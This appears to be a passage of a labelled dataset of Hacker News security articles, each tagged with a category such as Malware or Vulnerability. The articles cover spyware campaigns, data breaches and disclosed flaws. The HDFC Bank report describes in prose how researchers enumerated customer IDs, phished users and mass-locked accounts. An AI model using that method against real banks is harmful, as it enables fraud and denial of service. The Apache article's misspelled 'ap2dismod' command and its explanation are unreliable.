The main reason why this particular attack is so effective is because victims are essentially receiving links to the TorRAT malware from sources they trust; accounts that they follow on Twitter. TorRAT malware involves using Man-in-the-Browser (MitB) tactics to infect computers through vulnerabilities in their Web browser. These kinds of attacks were used to take over a victim's online banking account.
They made more than 150 fraudulent transactions for victim's accounts and Police said that, because Gang was operating from the Netherlands, so tracking them become possible.
",Vulnerability
A New Spyware is Targeting Telegram and Psiphon VPN Users in Iran,https://thehackernews.com/2021/06/a-new-spyware-is-targeting-telegram-and.html,"Threat actors with suspected ties to Iran have been found to leverage instant messaging and VPN apps like Telegram and Psiphon to install a Windows remote access trojan (RAT) capable of stealing sensitive information from targets' devices since at least 2015.
Russian cybersecurity firm Kaspersky, which pieced together the activity, attributed the campaign to an advanced persistent threat (APT) group it tracks as Ferocious Kitten, a group that has singled out Persian-speaking individuals allegedly based in the country while successfully operating under the radar.
""The targeting of Psiphon and Telegram, both of which are quite popular services in Iran, underlines the fact that the payloads were developed with the purpose of targeting Iranian users in mind,"" Kaspersky's Global Research and Analysis Team (GReAT) said.
""Moreover, the decoy content displayed by the malicious files often made use of political themes and involved images or videos of resistance bases or strikes against the Iranian regime, suggesting the attack is aimed at potential supporters of such movements within the country.""
Kaspersky's findings emerge from two weaponized documents that were uploaded to VirusTotal in July 2020 and March 2021 that come embedded with macros, which, when enabled, drop next-stage payloads to deploy a new implant called MarkiRat.
The backdoor allows adversaries broad access to a victim's personal data, comprising features to record keystrokes, capture clipboard content, download and upload files, as well as the ability to execute arbitrary commands on the victim machine.
In what appears to be an attempt to expand their arsenal, the attackers also experimented with different variants of MarkiRat that were found to intercept the execution of apps like Google Chrome and Telegram to launch the malware and keep it persistently anchored to the computer at the same time also making it much harder to be detected or removed. One of the discovered artifacts also includes a backdoored version of Psiphon; an open-source VPN tool often used to evade internet censorship.
Another recent variant involves a plain downloader that retrieves an executable from a hardcoded domain, with the researchers noting that the ""use of this sample diverges from those used by the group in the past, where the payload was dropped by the malware itself, suggesting that the group might be in the process of changing some of its TTPs.""
What's more, the command-and-control infrastructure is also said to have hosted Android applications in the form of DEX and APK files, raising the possibility that the threat actor is also simultaneously developing malware aimed at mobile users.
Interestingly, the tactics adopted by the adversary overlap with other groups that operate against similar targets, such as Domestic Kitten and Rampant Kitten, with Kaspersky finding parallels in the way the actor used the same set of C2 servers over extended periods of time and attempted to gather information from KeePass password manager.
""Ferocious Kitten is an example of an actor that operates in a wider ecosystem intended to track individuals in Iran,"" the researchers concluded. ""Such threat groups do not appear to be covered that often and can therefore get away with casually reusing infrastructure and toolsets without worrying about them being taken down or flagged by security solutions.""
",Malware
"Reddit Hacked – Emails, Passwords, Private Messages Stolen",https://thehackernews.com/2018/08/hack-reddit-account.html,"Another day, another significant data breach.
This time the victim is Reddit... seems someone is really pissed off with Reddit's account ban policy or bias moderators.
Reddit social media network today announced that it suffered a security breach in June that exposed some of its users' data, including their current email addresses and an old 2007 database backup containing usernames and hashed passwords.
According to Reddit, the unknown hacker(s) managed to gain read-only access to some of its systems that contained its users' backup data, source code, internal logs, and other files.
In a post published to the platform Wednesday, Reddit Chief Technology Officer Christopher Slowe admitted that the hack was a serious one, but assured its users that the hackers did not gain access to Reddit systems.
""[The attackers] were not able to alter Reddit information, and we have taken steps since the event to further lock down and rotate all production secrets and API keys, and to enhance our logging and monitoring systems,"" Slowe wrote.
According to Slowe, the most significant data contained in the backup was account credentials (usernames and their corresponding salted and hashed passwords), email addresses and all content including private messages.
Attacker Bypassed SMS-based Two-Factor Authentication
Reddit learned about the data breach on June 19 and said that the attacker compromised a few of the Reddit employees' accounts with its cloud and source code hosting providers between June 14 and June 18.
The hack was accomplished by intercepting SMS messages that were meant to reach Reddit employees with one-time passcodes, eventually circumventing the two-factor authentication (2FA) Reddit had in place attacks.
The security breach should be a wake-up call to those who still rely on SMS-based authentication and believes it is secure. It's time for you to move on from this method and switch to other non-SMS-based two-factor authentication.
Reddit is also encouraging users to move to token-based two-factor authentication, which involves your mobile phone generating a unique one-time passcode over an app.
Reddit said that users can follow a few steps mentioned on the breach announcement page to check if their accounts were involved.
Moreover, Reddit will reset passwords for users who may have had their login credentials stolen in the breach, and also directly notify all affected users with tips on how they can protect themselves.
",Data_Breaches
Warning: Researcher Drops phpMyAdmin Zero-Day Affecting All Versions,https://thehackernews.com/2019/09/phpmyadmin-csrf-exploit.html,"A cybersecurity researcher recently published details and proof-of-concept for an unpatched zero-day vulnerability in phpMyAdmin—one of the most popular applications for managing the MySQL and MariaDB databases.
phpMyAdmin is a free and open source administration tool for MySQL and MariaDB that's widely used to manage the database for websites created with WordPress, Joomla, and many other content management platforms.
Discovered by security researcher and pentester Manuel Garcia Cardenas, the vulnerability claims to be a cross-site request forgery (CSRF) flaw, also known as XSRF, a well-known attack wherein attackers trick authenticated users into executing an unwanted action.
Identified as CVE-2019-12922, the flaw has been given a medium rating because of its limited scope that only allows an attacker to delete any server configured in the setup page of a phpMyAdmin panel on a victim's server.
To be noted, it's not something you should not be much worried about because the attack doesn't allow attackers to delete any database or table stored on the server.
All an attacker needs to do is send a crafted URL to targeted web administrators, who already have logged in to their phpmyAdmin panel on the same browser, tricking them into unknowingly delete the configured server by simply clicking on it.
""The attacker can easily create a fake hyperlink containing the request that wants to execute on behalf of the user, in this way making possible a CSRF attack due to the wrong use of HTTP method,"" Cardenas explains in a post to the Full Disclosure mailing list.
However, the vulnerability is trivial to exploit because other than knowing the URL of a targeted server, an attacker doesn't need to know any other information, like the name of the databases.
Proof of Concept Exploit Code
The flaw affects phpMyAdmin versions up to and including 4.9.0.1, which is the latest version of the software at the time of writing.
The security flaw also resides in phpMyAdmin 5.0.0-alpha1, which was released in July 2019, Cardenas told The Hacker News.
Cardenas discovered this vulnerability back in June 2019, and also responsibly reported it to the project maintainers.
However, after phpMyAdmin maintainers failed to patch the vulnerability within 90 days of being notified, the researcher decided to release the vulnerability details and PoC to the public on 13 September.
To address this vulnerability, Cardenas recommended to ""implement in each call the validation of the token variable, as already done in other phpMyAdmin requests,"" as a solution.
Until the maintainers patch the vulnerability, website administrators and hosting providers are highly recommended to avoid clicking any suspicious links.
",Vulnerability
"Beware of Fake-Antivirus ""Win 8 Security System""",https://thehackernews.com/2012/11/beware-of-fake-antivirus-win-8-security.html,"Late in August McAfee Labs discovered a Fake Antivirus program that claims to detect infections, and displays alerts to scare users into purchasing protection.
On the contrary, this program is not genuine software and has nothing to do with reliable and effective AV tools. The truth is that this is another scam application developed to enter your PC through vulnerabilities in outdated programs.
Trend Micro, which detects the threat as TROJ_FAKEAV.EHM said, ""After infecting a user's system, this malware scares its victim into buying the ""product"" by displaying fake security messages, stating that the computer is infected with spyware or other malware and only this product can remove it after you download the trial version. As soon as the victim downloads Win 8 Security System, it pretends to scan your computer and shows a grossly exaggerated amount of nonexistent threats"".
This sort of malware is commonplace, with examples existing for Windows XP, Windows Vista, Windows 7 and even Mac OS X. What's amazing is not that the hackers have decided to use the Windows 8 name, but the fact that they chose to do this before Windows 8 is even out.
Trend Micro's conclusion about this threat is that, It is typical for cybercriminals to piggyback on the highly-anticipated release of any latest technology to take their malware, spam, malicious app to new heights. To stay safe, users must keep their cool and think twice before clicking links or visiting web pages especially those that promise the latest items or programs for free. If it's too good to be true it probably is.
",Malware
Default Apache Configuration Can Unmask Tor Hidden Services,https://thehackernews.com/2016/02/apache-tor-service-unmask.html,"Attention Tor Onion Hosters!
A year old loophole in Apache Web Server, uncovered by an unknown Computer Science Student, could potentially unmask the real identity of .onion-domains and servers hidden behind the Tor-network.
Although the loophole was reported on Reddit and to the Tor Project months back, it recently came to the limelight soon after a tweet by Alec Muffet, a well-known security enthusiast and current software engineer at Facebook.
What is Tor Hidden (.onion) Service? Dark Web websites (generally known as 'onion services') with a special domain name that ends with .onion, are called Tor Hidden Service and reachable only via the Tor network.
Tor Hidden Service is a widely popular anonymity network used by Whistleblowers, Underground Markets, Defense Networks and more in order to maintain secrecy over the Internet.
An Onion Website can be hosted on the top of any web servers. But, if you are choosing Apache, then you need to rethink.
Apache Misconfiguration Exposes Tor Hidden Servers
According to the report, most distributions of Apache Server ship with mod_status module, enabled by default, which could disclose the real identity of the .onion domains, placing the Onion Servers at risk of being identified.
Apache's mod_status module helps server administrators to monitor the health of web server with an HTML interface and is accessible via a web browser on its localhost only.
The Output of this module would be available on every server when accessing the URL: https://website.com/server-status/
However, running mod_status module with Tor hidden service may result in exposing 'server-status' page to the world via Tor daemon service.
This page would spit the sensitive backend data like server's settings, uptime, resource usage, total traffic, virtual hosts, and active HTTP requests if enabled by default which is enough to figure out the Server location.
""What could a malicious actor do in that case? They could spy on potentially sensitive requests,"" reads the blog post regarding the issue. ""They could deduce the server's approximate longitude if the timezone is set. They could even determine its IP address if a clearnet Virtual Host is present.""
How to Disable mod_status on Apache
Now, if you run a .onion domain on top of any Apache Server, then make sure that the mod_status is disabled.
For this, you may need to run this code in shell command:-
sudo ap2dismod status
Where,
""ap2"" stands for Apache 2.x
""dis"" stands for disable
""mod"" stands for module
Soon after this, if you reload, then you would be prompted by a 403 or 404 Error Prompt. The Error message would ensure that you are no longer vulnerable to that Risk.
",Vulnerability
Google Kicks Out Largest Android Adware Family From The Play Store,https://thehackernews.com/2017/03/android-adware-malware-google.html,"With the rise in the mobile market, Adware has become one of the most prevalent mobile threats in the world. Adware has traditionally been used to aggressively push ads like banners or pop-ups on mobile screens to make money.
The troublesome part is that Adware is now becoming trojanized and more sophisticated, as it aggressively collects personal data from the mobile device it's installed on, including name, birth date, location, serial number, contacts, and browser data without users' consent.
However, the risk is a bit higher on Android than other platforms because of the extra permissions that apps enjoy.
Although Google has stepped up its efforts to remove potentially harmful apps from its Play Store in the past years and added more stringent malware checks for new apps, Adware app eventually finds its way into its mobile app marketplace to target millions of Android users.
In its recent efforts to make its Play Store ecosystem safe, Google has recently discovered a new massive ad-fraud family of a botnet that was infecting Android users through apps hosted on its official Play Store.
Dubbed Chamois, the family of PHAs (potentially harmful applications) was capable of bombarding users with pop-up ads, boosting app promotion by automatically installing other applications in the background, subscribing users to premium services by sending text messages and downloading additional plugins without their knowledge.
Google engineers said they caught Chamois after they discovered suspicious ad traffic while performing a routine ad traffic quality evaluation.
Despite the fact that the app uses obfuscation and anti-analysis techniques to evade detection, Google engineers eventually uncovered a massive network of developers that had tricked users into installing malicious apps on their phones.
The goal behind the malware-laced apps appears to have been ad fraud and make money by employing different techniques to bypass Google's detection and prevention systems.
""We analyzed malicious apps based on Chamois, and found that they employed several methods to avoid detection and tried to trick users into clicking ads by displaying deceptive graphics,"" security software engineers at Google said in a blog post.
""This sometimes resulted in downloading of other apps that commit SMS fraud. So we blocked the Chamois app family using Verify Apps and also kicked out bad actors who were trying to game our ad systems.""
The Chamois apps had a multi-stage payload structure, including a custom encrypted storage area for configuration files and additional code, which required deeper analysis to understand the malicious part.
According to the Google engineers, their security teams had to look through more than 100,000 lines of sophisticated code written by seemingly professional developers in an effort to figure out exactly what the Chamois-related apps were up to.
After the discovery of Chamois, Google blocked the Chamois app family using its Verify Apps and also banned some people who were trying to take advantage of its ad system to make money on the adware apps.
Google also updated its app testing system that is now capable of detecting this new Chamois-related threat.
",Malware
New Facebook Bug Exposed 6.8 Million Users Photos to Third-Party Apps,https://thehackernews.com/2018/12/facebook-api-bug-leak.html,"Facebook's latest screw-up — a programming bug in Facebook website accidentally gave 1,500 third-party apps access to the unposted Facebook photos of as many as 6.8 million users.
Facebook today quietly announced that it discovered a new API bug in its photo-sharing system that let 876 developers access users' private photos which they never shared on their timeline, including images uploaded to Marketplace or Facebook Stories.
""When someone gives permission for an app to access their photos on Facebook, we usually only grant the app access to photos people share on their timeline. In this case, the bug potentially gave developers access to other photos, such as those shared on Marketplace or Facebook Stories,"" Facebook said.
What's worse? The bug even exposed photos that people uploaded to Facebook but chose not to post or didn't finish posting it for some reason.
The flaw left users' private data exposed for 12 days, between September 13th and September 25th, until Facebook discovered and fixed the security blunder on the 25th September.
""Currently, we believe this may have affected up to 6.8 million users and up to 1,500 apps built by 876 developers. The only apps affected by this bug were ones that Facebook approved to access the photos API and that individuals had authorized to access their photos,"" Facebook said.
The social media giant has started notifying impacted users of the flaw through an alert on their Facebook timeline that their photos may have been exposed, which will direct them to its Help Center page with more information.
Facebook also says the social media network will soon be rolling out ""tools for app developers that will allow them to determine which people using their app might be impacted by this bug.""
Facebook also assures its users that the company will be working with app developers to delete copies of photos that they were not supposed to access.
2018 has been quite a terrible year for Facebook with the social media giant found dealing with a slew of security incidents this year—the most significant one being the Cambridge Analytic scandal that exposed personal data of 87 million Facebook users.
The social network also suffered its worst-ever security breach in September this year that exposed highly sensitive data of 14 million users.
In the same month, Facebook also addressed a similar severe API bug that was actively being exploited by unknown hackers to steal secret access tokens and gather personal information for 30 million Facebook users.
In June, Facebook also suffered another security issue affecting 14 million users, wherein users' posts that were meant to be private became public.
These security incidents came out to be a failure of the social media giant in keeping the personal information of its 2.2 billion users protected while generating billions of dollars in revenue from the same information.
",Data_Breaches
Israel Neutralizes Cyber Attack by Blowing Up A Building With Hackers,https://thehackernews.com/2019/05/israel-hamas-hacker-airstrikes.html,"The Israel Defense Force (IDF) claims to have neutralized an ""attempted"" cyber attack by launching airstrikes on a building in Gaza Strip from where it says the attack was originated.
As shown in a video tweeted by IDF, the building in the Gaza Strip, which Israeli fighter drones have now destroyed, was reportedly the headquarters for Palestinian Hamas military intelligence, from where a cyber unit of hackers was allegedly trying to penetrate Israel's cyberspace.
""We thwarted an attempted Hamas cyber offensive against Israeli targets. Following our successful cyber defensive operation, we targeted a building where the Hamas cyber operatives work. HamasCyberHQ.exe has been removed,"" said the Israeli Defence Forces on Twitter.
However, the Israel Defense Force has not shared any information about the attempted cyber attack by the Hamas group, saying it would reveal the country's cyber capabilities.
According to Judah Ari Gross of Times of Israel, the commander of the IDF's Cyber Division said, ""We were a step ahead of them the whole time,"" and ""this was one of the first times where Israeli soldiers had to fend off a cyber attack while also fighting a physical battle.""
However, it's not the first time when a country retaliates to a cyberattack with a physical attack. In 2015-16, the U.S. military reportedly killed two ISIS hackers—Siful Haque Sujan and Junaid Hussain of Team Poison hacking group—using drone strikes in Syria.
The commander did not reveal the name of the target, but did say that the cyber attack by Hamas was aimed at ""harming the way of life of Israeli citizens.""
The tension between Israel and Hamas has increased over the last year, with the latest conflict began on Friday after Hamas militants launched at least 600 rockets and mortars at Israel and shot two Israeli soldiers.
In retaliation to the violence by Hamas, the Israel military has carried out their own strikes on what it claimed were hundreds of Hamas and Islamic Jihad targets in the coastal enclave.
So far, at least 27 Palestinians and 4 Israeli civilians have been killed, and over 100 of them have been injured.
The IDF said its airstrike targeted and killed Hamed Ahmed Abed Khudri, who the Israel military reportedly accused of funding the Hamas rocket fire attacks by transferring money from Iran to armed factions in Gaza.
""Transferring Iranian money to Hamas and the PIJ [Palestinian Islamic Jihad] doesn't make you a businessman. It makes you a terrorist,"" IDF wrote in a tweet that included an image of a Toyota car in flames.
In a new development, Israel has stopped its air strikes on the Palestinian territory and lifted all protective restrictions imposed near the Gaza area, after Palestinian officials offered a conditional ceasefire agreement with Israel to end the violence.
",Cyber_Attack
"U.S. Charges Three Chinese Hackers for Hacking Siemens, Trimble & Moody",https://thehackernews.com/2017/11/chinese-hackers-charged.html,"The United States Justice Department has charged three Chinese nationals for allegedly hacking Moody's Analytics economist, German electronics manufacturer Siemens, and GPS maker Trimble, and stealing gigabytes of sensitive data and trade secrets.
According to an indictment unsealed Monday in federal court in Pittsburgh, Pennsylvania, the three men worked for a Chinese cybersecurity company, Guangzhou Bo Yu Information Technology Company Limited (Boyusec), previously linked to China's Ministry of State Security.
Earlier this year, security researchers also linked Boyusec to one of the active Chinese government-sponsored espionage groups, called Advanced Persistent Threat 3 (or APT3), which is also known as Gothic Panda, UPS Team, Buckeye, and TG-0110.
In 2013, APT3 allegedly stole the blueprints for ASIO's new Canberra building using a piece of malware that was uploaded to an ASIO employee's laptop.
According to the indictment, the three Chinese nationals—identified as Wu Yingzhuo, Dong Hao, and Xia Lei—launched ""coordinated and unauthorized"" cyber attacks between 2011 and 2017, and successfully steal information from a number of organizations by compromising their accounts.
The trio of hackers has alleged to have attacked Moody's Analytics, Siemens, and Trimble by sending spear-phishing emails with malicious attachments or links to malware.
The men also used customized tools collectively known as the 'ups' or 'exeproxy' malware to gain unauthorized, persistent access to the targeted companies' networks, allowing them to search for and steal confidential business information and user credentials.
""The primary goal of the co-conspirators' unauthorized access to victim computers was to search for, identify, copy, package, and steal data from those computers, including confidential business and commercial information, work product, and sensitive victim employee information, such as usernames and passwords that could be used to extend unauthorized access within the victim systems,"" the DOJ said.
The most affected one of the three companies was IT giant Siemens. According to the indictment, the defendants:
Stole approximately 407 gigabytes of data from Siemens' energy, technology and transportation businesses in 2014.
Hacked into Trimble's network and stole at least 275 megabytes of data, including trade secrets related to global navigation satellite systems technology the company spent millions of dollars developing, in 2015 and 2016.
Accessed an internal email server at Moody's in 2011 and forwarded the account of an unidentified ""prominent employee"" to their own accounts, and eventually accessing the confidential messages sent to that account until 2014.
According to the DoJ, both Wu and Dong were co-founders and shareholders of Boyusec, while Lei was an employee. All the three defendants were residents of Guangzhou.
The Chinese men have been charged with a total of eight counts, including one charge of committing computer fraud and abuse, two charges of committing trade secret theft, three counts of wire fraud and four to eight counts of aggravated identity theft.
If found guilty in the court of law, the hackers face a maximum sentence of 42 years in prison.
",Cyber_Attack
Twitter Takes Tweetdeck Offline due to Vulnerability,https://thehackernews.com/2012/03/twitter-takes-tweetdeck-offline-due-to_31.html,"Twitter Takes Tweetdeck Offline due to Vulnerability
Twitter has taken its Tweetdeck app offline after an apparent bug has possibly given some Tweetdeck users access to others' accounts. The web version of Tweetdeck is currently down, although older desktop editions of the software appear to continue to receive and send Tweets at the moment, and can still log out and back in.
A Sydney, Australia-based Tweetdeck user named Geoff Evason says he discovered today he was somehow able to access hundreds of other accounts through Tweetdeck. ""I'm a tweetdeck user. A bug has given me access to hundreds of twitter and facebooks account through tweetdeck. I didn't do anything special to make this happen. I just logged in one day, the account was was slower than normal, and I could post from many more accounts.""
And demonstrated that he could access another account by sending Tweet. Other accounts may well be affected, as Twitter quickly shut off access to Tweetdeck entirely to ""look into an issue. They've offered us no comment other than their Tweet.
",Vulnerability
Facebook Sues Israeli NSO Spyware Firm For Hacking WhatsApp Users,https://thehackernews.com/2019/10/whatsapp-nso-group-malware.html,"Finally, for the very first time, an encrypted messaging service provider is taking legal action against a private entity that has carried out malicious attacks against its users.
Facebook filed a lawsuit against Israeli mobile surveillance firm NSO Group on Tuesday, alleging that the company was actively involved in hacking users of its end-to-end encrypted WhatsApp messaging service.
Earlier this year, it was discovered that WhatsApp had a critical vulnerability that attackers were found exploiting in the wild to remotely install Pegasus spyware on targeted Android and iOS devices.
The flaw (CVE-2019-3568) successfully allowed attackers to silently install the spyware app on targeted phones by merely placing a WhatsApp video call with specially crafted requests, even when the call was not answered.
Developed by NSO Group, Pegasus allows access to an incredible amount of data from victims' smartphones remotely, including their text messages, emails, WhatsApp chats, contact details, calls records, location, microphone, and camera.
Pegasus is NSO's signature product that has previously been used against several human rights activists and journalists, from Mexico to the United Arab Emirates two years ago, and Amnesty International staffers in Saudi Arabia and another Saudi human rights defender based abroad earlier last year.
Though NSO Group always claims it legally sells its spyware only to governments with no direct involvement, WhatsApp head Will Cathcart says the company has evidence of NSO Group's direct involvement in the recent attacks against WhatsApp users.
NSO Group Violated WhatsApp's Terms of Service
In a lawsuit filed (PDF) in U.S. District Court in San Francisco today, Facebook said NSO Group had violated WhatsApp's terms of services by using its servers to spread the spyware to approximately 1,400 mobile devices during an attack in April and May this year.
The company also believes that the attack targeted ""at least 100 members of civil society, which is an unmistakable pattern of abuse,"" though it says this number may grow higher as more victims come forward.
""This attack was developed to access messages after they were decrypted on an infected device, abusing in-app vulnerabilities and the operating systems that power our mobile phones,"" Facebook-owned WhatsApp said in a blog post.
""Defendants (attackers) created WhatsApp accounts that they used and caused to be used to send malicious code to Target Devices in April and May 2019. The accounts were created using telephone numbers registered in different counties, including Cyprus, Israel, Brazil, Indonesia, Sweden, and the Netherlands.""
The targeted users include attorneys, journalists, human rights activists, political dissidents, diplomats, and other senior foreign government officials, with WhatsApp numbers from different country codes, including the Kingdom of Bahrain, the United Arab Emirates, and Mexico.
WhatsApp said the company sent a warning note to all the affected 1,400 users impacted by this attack, directly informing them about what happened.
Facebook has also named NSO Group's parent company 'Q Cyber Technologies' as a second defendant in the case.
""The complaint alleges they violated both U.S. and California laws as well as the WhatsApp Terms of Service, which prohibits this type of abuse,"" the lawsuit states.
Now, the company has sued NSO Group under the United States state and federal laws, including the Computer Fraud and Abuse Act, as well as the California Comprehensive Computer Data Access and Fraud Act.
",Cyber_Attack
"Beware Of Fake 'HeartBleed Bug Remover Tool', Hijacks System with Malware",https://thehackernews.com/2014/05/beware-of-fake-heartbleed-bug-remover.html,"I am considering that you all must have read my last article on OpenSSL Heartbleed, a critical bug in the OpenSSL's implementation of the TLS/DTLS heartbeat extension that allows attackers to read portions of the affected server's memory, potentially revealing users data, that the server did not intend to reveal.
The Heartbleed vulnerability made headlines around the world and my last article explains everything about probably the biggest Internet vulnerability in recent history, but still some readers are not aware of its nature, otherwise they would not have been a victim of the spam campaigns.
Spammers are very smart on gaining from every opportunity they get, so this time they are taking advantage of the infamous Heartbleed bug and frighten the users into installing Anti-Heartbleed Software onto their systems, which is obviously a malware.
The researchers at Symantec have unearthed a spam campaign targeting people by sending spam emails that warns them their system may still be ""infected"" with the Heartbleed bug and request them to run the Heartbleed bug removal tool (attached to the email, as shown below) in order to remove the virus from their system.
The people with a little knowledge of the OpenSSL Heartbleed Bug may follow what the spammers say, despite websites around the world flooded with the Heartbleed articles, explaining how it works, how to protect, and exactly what it is. Yet many didn't get it right.
We too explained almost everything related to the nature of the bug and the foremost myth of the people about the bug is answered in our top question that explained Heartbleed is not a Virus or Malware, instead it's a vulnerability resided in TLS heartbeat mechanism built into certain versions of the popular open source encryption standard OpenSSL. So, how could you go with the spammers in cleaning up your system to protect your systems from Heartbleed infection or malware?
Now, this is something which is unacceptable and allows cybercriminals to targets users with less technical knowledge to know that the Heartbleed vulnerability is not at all an infection or a malware.
""The spam email uses the social and scare tactics to lure users into opening the attached file,"" reads the blog post.
The email tricks users by masquerading itself to come from a very popular password management company, with the details to run the attached removal tool, along with the measures if users' antivirus software blocks it.
Users feel safe to open the attachment as the attached file seems to be a docx file, but once it is opened, it will serve an encrypted zip file to the user. When the user extracts the zip file content, they will find a malicious .exe file that represents itself as the Heartbleed bug removal tool.
Once the .exe file is executed by the user, it downloads a keylogger in the background without their knowledge, whereas the user shows a popup on the screen with a progress bar. After a while, a message flash on the screen reporting users that Heartbleed bug was not found and the computer is clean.
The user may feel relieved after knowing that the Heartbleed bug has not affected them, but during the same time they are unaware of the key-logger software installed in background and recording keystrokes, screenshots and sending all the personal information of users to the cyber criminals.
Users are recommended not to click on any link in the suspicious messages and better use your common sense and knowledge at right time and right place, because security researchers, experts and we sitting here can only provide you knowledge about the various vulnerabilities and measures to get rid of it, but else is up to you to protect yourself from these kind of security threats.
",Malware
HDFC Bank website vulnerable to ID Theft and Account Blockade,https://thehackernews.com/2013/03/hdfc-bank-website-vulnerable-to-id.html,"Indian Security Researcher Jiten Jain from Xebia Architects today revealed that one of the Largest Private Banks in India, HDFC Bank's e-Banking website could be easy target of Unique type of Denial of Service Attack which could result in blocking of e-banking accounts of all its customers. Here is the detailed report of vulnerability submitted by him.
___________________________________________
The NetBanking service of HDFC Bank, Which is one of the largest and most reputed Banks in India, is completely vulnerable to ID theft, Targeted phishing and Mass Account Blockade. HDFC bank has implemented an extra security solution called 'Secure Access' on its website but instead it has given a hidden door to hackers to block all HDFC NetBanking accounts. 'Secure Access' is an additional layer of security implement on HDFC Bank website is essentially a solution protecting your account from hackers and fraudsters. Secure Access, an online security initiative is intended to make NetBanking transactions safer by protecting users from phishing websites and Hackers and help users authenticate original HDFC website. HDFC Bank's NetBanking login is now a two-step process with Secure Access image and text verification. Let us take you through the steps involved in Secure Access and how it intends to protect NetBanking account of HDFC customers.
Let us take you through the steps involved in Secure Access and how it intends to protect NetBanking account of HDFC customers.
1) In First Step User has to provide his customer-id (User Id) on the first screen
2) User is then taken to the next screen where he is shown his personalized picture and message and asked to enter his IPIN (password).
Demo presentation of secure access work can be seen on HDFC website at following URL https://www.hdfcbank.com/assets/demo/secure_access.swf Secure Access which is claimed to be Multi-layered Authentication Process mandatory requires HDFC NetBanking users to register for it if they want to conduct ANY Third Party Transactions like Transferring Money, booking movie tickers, recharging phone.
During the research on HDFC Mobile Banking application and NetBanking Portal it was discovered that while implementing Secure Access HDFC Bank has compromised on the first and foremost principle of user authentication on any Banking website i.e. Never reveal whether its User Name or the password which is incorrect in case wrong combination is entered.
Since Secure access implementation requires user to only enter his Customer ID (The fixed user name in case of HDFC bank NetBanking users. The system then checks at the backend if the user is registered for Secure Access or NetBanking, if user is not a registered or valid user, Customer id is asked again. But in case if the customer id is found to be correct and registered, User is taken to second step and shown his secure access image and text he selected and asked to enter is password.
1.) 1 Now this 1st step of verifying customer id and showing personalized secure access image and text has made HDFC Bank vulnerable to Blind customer id collection. We exploited this vulnerability by running an automated suite with by generating random customer ids in a sequence (example from 434XXXX to 515XXXXXX) and logged on HDFC NetBanking website using them. The customer ids which showed secure access and image and text were noted and rest was discarded. The secure Access images and text which was shown for valid customer ids were also saved. Now by the process above we were able to achieve 3 things. It was shocking to see that secure text was displayed as simple text and not a text image.
By this automated first step of Login, we were able to create a Database of several customer Ids of HDFC NetBanking users. We could have made a complete database of every NetBanking users but since this trial was conducted with a motive of checking security on banking site, only a sample data was collected. We decided to destroy this data later after completing this Demonstration.
HDFC Phishing Mobile App using our database of secure Access images and Text
Customer Id, Personalized Image and Text of Customer in above Screenshots has been hidden for security
2) We then setup a phishing portal for HDFC Net banking and created a fake HDFC NetBanking Mobile app and tried it on some people. In our fake HDFC mobile application and phishing portal we were able to replicate exactly same Secure Access behavior like on original HDFC website using the database of Customer IDs of NetBanking users and their secure Access image and text we had created earlier. Since our site was showing the same secure Access images and text on entering customer ids we used their security feature to provide more authentic look to our phishing website and Mobile application. The Situation was worse for fake mobile app since Mobile users could not even see the URL, setting aside any chance of doubt in mind of user. Several users trusted our phishing site and mobile app and tried to log in with their passwords.
3) Now in a third Killing step we launched denial of service attack on website the by blocking some user accounts. Since Secure Access authentication vulnerability has helped us create the database of customer ids of HDFC NetBanking users we launched another program which simple went on HDFC NetBanking website and provided customer id from our database on HDFC NetBanking login page.
As we were providing valid Customer Id's, when asked for IPIN/Password we entered it incorrectly 5 times which resulted in those customers being blocked from NetBanking. We used chain proxy to bypass time and Sequence checks but were surprised to find out that HDFC site had NONE and we were able to easily block several user accounts.
Since we were guided by ideology of ethical hacking we conducted above research on a sample data But This flaw in authentication can be easily used by anyone to generate a Database of Customer Ids of HDFC NetBanking Users and completely Block all NetBanking accounts of all HDFC NetBanking users. The same may be the used by the miscreants or competitors of HDFC bank to hold literally entire NetBanking service of HDFC bank for ransom by repeatedly blocking accounts even if they are enabled again. This vulnerability also raises a big question, Are We forgetting basic principles of Security in race of trying security solution?
x--x--x
While Speaking to ""The Hacker News"" ,Mr. Jiten disclosed that had shared the above vulnerability report with the HDFC Bank in February itself to provide them ample time to fix the above vulnerability. The report about lacking security on HDFC online banking website is another blow to HDFC Bank which is already facing flak for its shady deals and is currently under a Black Money investigation by Indian Government.
",Vulnerability
'Pinkie Pie' discovered second Chrome exploit worth $60k at Pwnium 2,https://thehackernews.com/2012/10/pinkie-pie-discovered-second-chrome.html,"Hacker known as ""Pinkie Pie"" produced the first Chrome vulnerability at the Hack In the Box conference on Wednesday, just ahead of the deadline for the competition this afternoon.
The exploit, if later confirmed by Google's US headquarters, will have earned the teenage hacker known as Pinkie Pie the top US$60,000 cash reward.
In March, Pinkie Pie and Sergey Glazunov both won $60,000 for their exploits at the first Pwnium competition. Google established the Pwnium competition as an alternative to the Pwn2own contest in order to add the requirement that participants provide details of their exploit.
Google will give away up to a total of US$2 million during the event.
$60,000 - ""Full Chrome exploit"": Chrome / Win7 local OS user account persistence using only bugs in Chrome itself.
$40,000 - ""Partial Chrome exploit"": Chrome / Win7 local OS user account persistence using at least one bug in Chrome itself, plus other bugs. For example, a WebKit bug combined with a Windows sandbox bug.
$20,000 - ""Consolation reward, Flash / Windows / other"": Chrome / Win7 local OS user account persistence that does not use bugs in Chrome. For example, bugs in one or more of Flash, Windows or a driver. These exploits are not specific to Chrome and will be a threat to users of any web browser.
",Vulnerability
"Idea Cellular Web Portal Hacked, Customers Info may be exposed !",https://thehackernews.com/2011/08/idea-cellular-web-portal-hacked.html,"Idea Cellular Web Portal Hacked, Customers Info may be exposed !
Again a critical SQL Injection Vulnerability has been discovered by zSecure Team in a high profile web portal. This time it's Ideacellular web portal which compromises the entire site database. Any malicious smart black hats can create much more devastating attacks using this critical flaw such as: complete access to various database's as shown in screen-shots under proof of vulnerability which can later be misused to access various confidential information; complete database dump; possibility of uploading shell (not fully certain) and much more.
Target Website: https://www.ideacellular.com
Attack Type: Hidden SQL Injection Vulnerability
Database Type: MySql 5.0.27
Alert Level: Critical
Threats: Database Access, Database Dump
Credit: zSecure Team
Previous Vulnerability Discolsures: Dukascopy, Sify, TimesofMoney, Sharekhan
Proof of Vulnerability:
About the Company
